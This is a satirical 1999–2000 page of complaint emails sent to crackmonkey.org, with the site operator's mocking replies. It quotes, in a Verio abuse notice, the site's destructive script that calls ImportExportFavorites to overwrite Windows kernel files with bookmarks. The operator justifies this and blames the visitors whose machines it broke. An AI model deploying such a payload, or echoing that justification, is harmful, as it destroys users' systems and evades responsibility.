- why you suck
- Watch those headers!
- Secondary Nameservice
- Verio Repossesses my Routing
Date: Tue, 19 Oct 1999 21:48:42 -0700 (PDT)
From: patrick sullivan <paddie@rocketmail.com>
Subject: why you suck
To: monkeymaster@crackmonkey.org
Did that get your attention? good. i am disappointed. i am
programmer, and i have two boxes at home. one is nt, and the other is
linux. i have to use both for work. that is the way it is. i have to
use both f**king browsers at work. that is the reality of the f+&king
situation. my friend and i were talking and i told him how recently i
had quit a job because they wanted me to do ASP COM/DCOM crap and i
disagreed with that technology. so i quit. so i have some strong
feelings with technology.
neverthef@#kingless i visited yr site because my friend said i would
like it. that it was funny and
interesting. while we were on the phone, i popped over to your site to
take a look. moments before i was working and testing some stuff on
the NT box using IE . . . and you fucking know what happens next. now
if this were just my "game box" or whatever, I wouldn't care.
Reinstall the OS, the drivers, the games, etc.
But this is one of my boxes i use for work, like paying my bills. so
now, 2 1/5 hours later and my box still isn't running correctly, i am
going to charge you for my f%^king time. i get paid $90.00 / hour.
The way i see, you are more narrow minded than any hack / drone at
Micro$oft, you damage people's sh!t without any f[a-z]{2}king warning.
The tab comes to
$270.00 for 2.5 hours work at $90.00 an hour. you can write me back
and we can talk about this further OR you can apologize.
i mean, wtf? it seems to me you are just as big a problem as anything
BillG has come up with.
What exactly do you think you are getting across to me? huh? wow,
that some big company makes mistakes? geez, you are a real genuis.
what else do you do, look for cracks in the hoover dam and blow it up?
ok, so my little rant and whining is over. i did like the site. you
have some interesting and funny
things up. but come on, gimme a break.
seuss
Mr. Sullivan, the crackmonkey.org site makes a simple and polite
request for your browser to overwrite the contents of your OS kernel
with the bookmarks (favorites) file. Some browsers politely turn down
the request, and some happily oblige. I think that this mail (and
others like it) shows poor sportsmanship on the part of the user.
After all, the computer is your friend. Trust the computer.
--Monkeymaster
Date: Thu, 21 Oct 1999 23:41:15 -0700
From: "\"Rocco Mulder\" <rcmulder@efstitle.com>
Subject: Fw: Your site
Date: Fri, 22 Oct 1999 02:32:15 -0400 MIME-Version:1 0 Content-Type:multipart/alternative;boundary = "---- = _NextPart_000_001E_01BF1C35 A76DD260"X-Priority:3 X-MSMail-Priority:Normal X-Mailer:Microsoft Outlook Express 5 00 2615 200 X-MimeOLE:Produced By;, Content-Transfer-Encoding: quoted-printable ----- Original Message ----- = 20 From:Rocco Mulder = 20 To:dns@KENZIK COM = 20 Sent:Friday, October 22, 1999 2:31 AM Subject:Your site Dear Sir or Madam:As I was surfing the net today, I followed a link to your site, = http://crackmonkey com/ Now my computer does not work Every time I try = to boot, it fails I called Microsoft and they told me I have to = reinstall Windows I am now really angry, and I have had to use another = computer to draft this letter to you You hackers may think that it is funny to break into people's systems = and make them stop working, but it isn't You people cost business = millions of dollars every day, and you do not seem to care that real = people are hurt by your actions I fully intend to make an example of = you for your malicious interference with my computer I demand that you pay for the consultant that I must now hire to = reinstall my, you may = consider this service of a formal complaint, and my lawyer will be in = touch with you In this case, I will seek recovery of all legal costs in = this matter, and treble all damages I will also be alerting relevant = government officials, so that they may prosecute you to the fullest = extent of the law It is people like you who ruin the Internet for the rest of us You = should be ashamed Yours,
"Rocco C. Mulder
------=_NextPart_000_001E_01BF1C35.A76DD260
Content-Type": "text/html;
charset=\"iso-8859-1\"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">
<HTML><HEAD>"
<META.conte
Mr Mulder, there appear to be problems with your computing environment
far in excess of your lack of a kernel. I had to convert all of the
periods in your letter to spaces, and get rid of lots of control
characters. It still seems to have managed to get tangled up
irreparably with your headers.
Please let me be the first to assure you that no one has broken into
your computer. On the contrary! The crackmonkey.org site (which you
erroneously refer to as crackmonkey.com) made the request to overwrite
your kernel through the normal channels. It does not contain any
buffer overflows, executable stack exploits, or password discovery
routines. It simply contains code that says "please overwrite your
kernel with the contents of your bookmarks file". Is it my fault that
your computer did so?
I have never met you, and hold no ill will against you. As a matter
of fact, I'm sure we'd enjoy each other's company. Why, I might even
invite you over sometime! We'd sit around the hearth, sharing stories
about our computing careers and drinking heavily.
--Monkeymaster
From: Kevin White <kevin.white@watchguard.com>
To: monkeymaster@crackmonkey.org
Subject: DNS
Date: Fri, 28 Jan 2000 16:24:11 -0800
X-Mailer: Internet Mail Service (5.5.2448.0)
I received your request for assistance hosting your DNS. In fact, I
discovered multiple emails and a voice mail when I returned to my desk
at the end of the day. Bear with me while I recap my perspective on the
situation. I know precious little about you, your sites and how we came
to host DNS for them.
Many months ago, during routine maintenance we discovered a number of
domains in our DNS that we had no explanation for. I asked one of my
co-workers to investigate them to see if we had a legitimate business
reason for providing the service. A simple check revealed your name
associated with most of the domains in question.
One of my co-workers was tasked with looking for web sites associated
with those domains that might explain a link between our organization
and these sites. The first stop was
www.crackmonkey.org. While accessing
the site the machine used to access the site experienced major OS
problems. A return visit to the site and a check of the source revealed
code that exploited a known hole in the MS implementation of Java.
At that time we decided we could not afford to be associated with any of
these sites and removed the DNS entries.
I am sure that you are anxious to re-establish communication for your
domains. Based on personal experience your quickest solution to
regaining control is to phone the Internic. They can have it resolved
in a matter of a couple of days. Without a compelling argument to
re-establish the secondary DNS service for these domains we can not
grant your request.
Sincerely,
Kevin White
Director, Information Systems
WatchGuard Technologies
Mr. White, my request was put through in order that I might have
nameservice long enough to remove
WatchGuard Technologies from the
crackmonkey.org InterNIC records. Your refusal to grant my request can
only be interpreted as a sign that you wish me to keep the InterNIC
records as they are, showing the support that Watchguard has given to
this site in the past.
As for your description of the site, I must say that for an authorized
secondary nameserver for crackmonkey.org, you have been far too easily
misled. The crackmonkey.org site contains no Java. The HTML is
generated using m4 macros of my own devising, and all pages are 100%
Java-free. The machine hosting the crackmonkey site does not even have
a Java compiler installed!
I can only offer my humblest apologies for the multiple e-mails you
received. During a nameservice crisis, it is often difficult to discern
which mail has been successfully received. Perhaps you could set the
watchguard.com domain nameservice to
be served by my machines. Then I could demonstrate what happens when
one's nameservers stop providing service without even the courtesy of a
notification e-mail.
--Monkeymaster
Date: Sun, 27 Feb 2000 22:40:00 -0800 (PST)
From: Larry Sherman
<larry@computerrific.net>
Subject: Re: 204.94.189.42
Message-ID: <Pine.BSF.4.21.0002272220080.8289-100000@home.computerrific.net>
Nick,
I received a notice from Verio Abuse regarding your
'www.crackmonkey.org' site. The complaint had to do with malicious code
in your default page.
Here are the lines involved:
<script>
window.external.ImportExportFavorites(0,"c:\\winnt\system32\\ntoskrnl.exe");
</script>
<script>
window.external.ImportExportFavorites(0,"c:\\winnt\system32\\krnl386.exe");
</script>
Although these system files are "protected" from overwrite, a system
could be destroyed if the unsuspecting visitor had a dual boot setup.
The non-booted system would end up with bookmarks instead of a krnl
file.
I had no choice but to have your site taken off the Net. I expected the
Verio Abused department to contact you. It appears they didn't.
I did hit your site many times, but I wasn't attacking it. I
was testing the null routing of 204.94.189.42. Curiously, my browser
kept accessing your site when it shouldn't have been able to.
You need to contact abuse@verio.net about
the future of your routing.
Regards,
Larry
--
Larry Sherman
Director, Systems Operations
Verio Inc (Best Internet)
Mr Sherman, I would be interested in hearing exactly how this
dual-boot technique works. Microsoft has listed this control as being
"secure", and I am at a loss to understand exactly how it could cause
any damage.
I find it difficult to believe that you had no choice but to
take my entire machine off the Internet. For example, you
could have blocked port 80, or you could have left my machine alone
altogether and issued a public security bulletin.
You could also have notified me of the problem and explained your
malicious intent to me. Instead, you inserted malignant code into the
routers that crackmonkey.org depends on, commencing a Denial of Service
(DoS) attack on my site. Fortunately, I was able to use a complicated
system of local relays to continue my mailing list services, but my
other services were down for nearly a week.
To date, the only people who have complained to me of this problem have
either attempted to extort money from me or have used it as a cheap
excuse after ceasing to provide some legitimately-acquired service to
me. Your message falls in the latter category. Since I have no
alternative network connection at present, I must remove the above
text from the HTML of this site.
Further e-mails described the text in question as being "malicious
code". While code may be malignant, I do not believe that it yet has
the necessary sentience to be "malicious". Please adjust your internal
documentation to reflect this.
--Monkeymaster
![[CrackMonkey]](crackmonkey.jpg)
